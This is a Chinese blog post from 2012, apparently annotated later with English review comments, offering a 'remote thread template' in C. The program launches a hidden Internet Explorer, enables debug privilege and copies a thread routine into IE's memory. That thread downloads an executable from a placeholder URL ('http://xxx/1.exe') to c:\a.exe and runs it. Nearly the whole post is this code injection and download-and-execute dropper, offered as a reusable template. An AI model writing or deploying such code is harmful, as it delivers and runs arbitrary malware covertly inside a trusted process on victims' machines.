
远程线程模板(将执行代码写入目标进程)

Posted on 2012-02-02 08:40  Biffo Lee  阅读(494)  评论(0编辑  收藏  举报

这个方法是直接将 CreateRemoteThread 的线程过程函数 ThreadProc 写入目标进程中，典型流程为：提权 -> 打开进程 -> 在目标进程内申请空间 -> 写入线程代码 -> 用 CreateRemoteThread 启动线程函数。

#include <tlhelp32.h>
#include<stdio.h>
#include <urlmon.h>
#pragma comment(lib, "urlmon.lib")
#include <shellapi.h>

// Parameter block for ThreadProc. Inject fills it in this process, copies it
// into the target with WriteProcessMemory and passes the remote address as the
// thread argument, so everything ThreadProc needs (including the two function
// addresses it calls through) travels in this plain-data struct.
// NOTE(review): DWORD is 32 bits, so the address fields only hold a full
// pointer in a 32-bit build.
typedef struct _RemotePara
{
// URL of the file to download
char Url[255];
// Path the downloaded file is saved to
char FilePath[255];
// Address of URLDownloadToFileA, resolved by the injecting process
DWORD DownAddr;
// Address of WinExec, resolved by the injecting process
DWORD ExecAddr;
}RemotePara;

// Thread routine that Inject copies byte-for-byte into the target process and
// starts there. It downloads lpPara->Url to lpPara->FilePath through the
// URLDownloadToFileA address stored in lpPara, then runs that file through the
// stored WinExec address with show state 1 (SW_SHOWNORMAL). Neither call's
// result is checked; the thread exit code is always 0.
// The thread's start address lies inside a private PAGE_EXECUTE_READWRITE
// region of the target (see Inject), which is the indicator memory scanners and
// thread-creation telemetry key on.
// NOTE(review): this only behaves as intended if the compiled body contains no
// references into this module (import thunks, literals, CRT/security-cookie
// calls); nothing here verifies that.
DWORD __stdcall ThreadProc(RemotePara *lpPara)
{
typedef UINT (__stdcall *MWinExec)(LPCSTR lpCmdLine, UINT uCmdShow);
typedef HRESULT (__stdcall *MURLDownloadToFile)(LPUNKNOWN pCaller,
   LPCTSTR szURL, LPCTSTR szFileName,
   DWORD dwReserved, LPBINDSTATUSCALLBACK lpfnCB);
MURLDownloadToFile myURLDownloadToFile;
    // Take the URLDownloadToFileA address from the parameter block
myURLDownloadToFile=(MURLDownloadToFile)lpPara->DownAddr;
// Download the file (HRESULT ignored)
    myURLDownloadToFile(0,lpPara->Url,lpPara->FilePath,0,0);
MWinExec myWinExec;
// Take the WinExec address from the parameter block
myWinExec=(MWinExec)lpPara->ExecAddr;
// Run the downloaded file (return value ignored)
myWinExec(lpPara->FilePath,1);
return 0;
}


// Returns the PID of the first process in a Toolhelp snapshot whose image name
// equals ProcessName case-insensitively, or 0 when the snapshot fails or
// nothing matches.
// NOTE(review): strupr() uppercases both strings in place, so ProcessName is
// modified by this call — WinMain passes a string literal here, which is
// undefined behaviour. The early return inside the loop skips CloseHandle, so
// the snapshot handle leaks on every successful lookup.
DWORD GetProcessID(char *ProcessName)
{
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(pe32);
HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
   printf("CreateToolhelp32Snapshot error");
   return 0;
}
BOOL bProcess=Process32First(hProcessSnap,&pe32);
while(bProcess)
{
   // First match wins; with several same-named processes the snapshot order decides
   if(strcmp(strupr(pe32.szExeFile),strupr(ProcessName))==0)
    return pe32.th32ProcessID;
   bProcess=Process32Next(hProcessSnap,&pe32);
}
CloseHandle(hProcessSnap);
return 0;
}

// Enables the named privilege (Inject passes SE_DEBUG_NAME) on the current
// process token. Returns 0 on success, 1 when the token cannot be opened or
// AdjustTokenPrivileges fails.
// SeDebugPrivilege is normally only present on an administrator's token, so
// this step — and the injection that depends on it — is the least-privilege
// boundary a standard-user account enforces.
// NOTE(review): a failed LookupPrivilegeValue is only printed, after which
// `luid` is used uninitialised; AdjustTokenPrivileges returning nonzero does
// not by itself mean the privilege was granted (GetLastError may report
// ERROR_NOT_ALL_ASSIGNED); hToken is never closed.
int EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),
   TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
   &hToken) )
{
   printf("OpenProcessToken error\n");
   return 1;
}
if(!LookupPrivilegeValue(NULL,name,&luid))
{
   printf("LookupPrivilege error!\n");
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = luid;
if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) )
{
   printf("AdjustTokenPrivileges error!\n");
   return 1;
}
return 0;
}

// Copies ThreadProc and a RemotePara block into process dwRemoteProcessId and
// starts ThreadProc there. Sequence: enable SeDebugPrivilege -> OpenProcess
// (PROCESS_ALL_ACCESS) -> VirtualAllocEx (RWX) -> WriteProcessMemory ->
// CreateRemoteThread. Every step is visible to process-access and
// thread-creation telemetry, and the fixed URL and drop path below are the
// observable artefacts of a run.
// Returns FALSE on the first failed call, TRUE once the remote thread exists;
// it neither waits for the thread nor reads its exit code.
// NOTE(review): no handle opened here (hWnd, hThread, the two module handles)
// is ever closed, and the failure paths leave the remote allocations behind.
BOOL Inject(const DWORD dwRemoteProcessId)
{
if(EnableDebugPriv(SE_DEBUG_NAME))
{
   printf("add privilege error");
   return FALSE;
}
// Process handle despite the name; PROCESS_ALL_ACCESS is requested
HANDLE hWnd=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId);
if (!hWnd)
{
   printf("OpenProcess failed");
   return FALSE;
}
// Allocate 4 KiB of RWX memory in the target for the thread code
void *pRemoteThread= VirtualAllocEx(hWnd, 0,
   1024*4, MEM_COMMIT|MEM_RESERVE,
   PAGE_EXECUTE_READWRITE);
if (!pRemoteThread)
{
   printf("VirtualAllocEx failed");
  
   return FALSE;
}
// Copy 4 KiB starting at &ThreadProc into the target.
// NOTE(review): the function is almost certainly shorter than that, so this
// also copies whatever the linker placed after it; nothing checks the size.
if (!WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,1024*4,0))
{
   printf("WriteProcessMemory failed");
   return FALSE;
}
// Fill in the RemotePara block
RemotePara myRemotePara;
ZeroMemory(&myRemotePara,sizeof(RemotePara));
// Addresses are resolved in this process; ThreadProc calls through them
// unchanged inside the target
HINSTANCE hurlmon=LoadLibrary("urlmon.dll");
HINSTANCE kernel=LoadLibrary("kernel32.dll");
myRemotePara.DownAddr=(DWORD)GetProcAddress(hurlmon,"URLDownloadToFileA");
myRemotePara.ExecAddr=(DWORD)GetProcAddress(kernel,"WinExec");
// Hard-coded download URL and drop path (placeholder host in the original)
char urlfile[255];
strcpy(urlfile,"http://xxx/1.exe");
strcpy(myRemotePara.Url,urlfile);
strcpy(myRemotePara.FilePath,"c:\\a.exe");
// Second remote allocation, for the parameter block; RWX although it only holds data
RemotePara *pRemotePara=(RemotePara *)VirtualAllocEx(hWnd,0,sizeof(RemotePara),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (!pRemotePara)
{
   printf("VirtualAllocEx failed");
  
   return FALSE;
}
// Copy the parameter block into the target
if (!WriteProcessMemory(hWnd,pRemotePara,&myRemotePara,sizeof(myRemotePara),0))
{
   printf("WriteProcessMemory failed");
   return FALSE;
}
// Start ThreadProc in the target with the remote RemotePara as its argument
HANDLE hThread=CreateRemoteThread(hWnd,0,0,(LPTHREAD_START_ROUTINE)pRemoteThread,pRemotePara,0,0);
if (!hThread)
{
   printf("CreateRemoteThread failed");
  
   return FALSE;
}
// NOTE(review): lowercase `true` (C++ / <stdbool.h>) while the failure paths use FALSE
return true;
}

// Entry point. Launches a hidden Internet Explorer from the system drive's
// Program Files, waits one second, looks the process up by image name and
// injects into it. Inject's result is ignored, and a PID of 0 (not found)
// is passed straight through to Inject.
// NOTE(review): the GetSystemDirectory return value is not checked, so Path
// may be unset before it is truncated; the one-second Sleep is the only
// synchronisation with the new process.
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
char Path[255];
    GetSystemDirectory(Path,sizeof(Path));
// Keep only the drive root ("X:\") of the system directory
Path[3]=0x00;
strcat(Path,"Program Files\\Internet Explorer\\iexplore.exe");
    WinExec(Path,SW_HIDE);
Sleep(1000);
// NOTE(review): GetProcessID uppercases its argument in place; this is a string literal
DWORD Pid=GetProcessID("iexplore.exe");
    Inject(Pid);
return 0;
}